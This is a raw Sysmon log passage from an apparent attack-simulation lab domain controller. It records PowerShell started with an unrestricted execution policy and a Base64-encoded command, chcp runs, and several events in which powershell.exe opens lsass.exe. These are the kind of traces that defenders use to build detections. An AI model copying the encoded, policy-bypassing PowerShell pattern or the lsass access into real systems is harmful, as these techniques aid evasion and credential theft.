ages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6cda4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c971(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c683(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c2be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7ea345bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\Syste
m.Management.Automation.ni.dll+7df51569(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df50adb(wow64) 154100x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.630{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.560{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.560{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:00.544{266CAFBE-6440-6064-D902-00000000AD01}3712\PSHost.132616656004785682.3712.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.529{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kuak4m2y.51p.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.529{266CAFBE-6440-6064-D902-00000000AD01}3712ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_up2lci2i.4hf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.513{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_up2lci2i.4hf.ps12021-03-31 12:00:00.513 10341000x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.497{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.466{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.466{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.466{266CAFBE-6440-6064-D802-00000000AD01}4220624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|UNKNOWN(00007FF8E8150069)|UNKNOWN(00007FF8E75D34F2)|UNKNOWN(00007FF8E75D312D)|UNKNOWN(00007FF8E809B42B)|UNKNOWN(00007FF8E759009F)|UNKNOWN(00007FF8E75F3B11)|UNKNOWN(00007FF8E75D5B20)|UNKNOWN(00007FF8E75D5B20)|UNKNOWN(00007FF8E75D59B1)|UNKNOWN(00007FF8E75C66D1)|UNKNOWN(00007FF8E75D3C13)|UNKNOWN(00007FF8E75D37E0)|UNKNOWN(00007FF8E75D34F2)|UNKNOWN(00007FF8E75D312D)|UNKNOWN(00007FF8E809B42B)|UNKNOWN(00007FF8E75B83D8)|UNKNOWN(00007FF8E75B794A) 154100x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.478{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBB
AEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 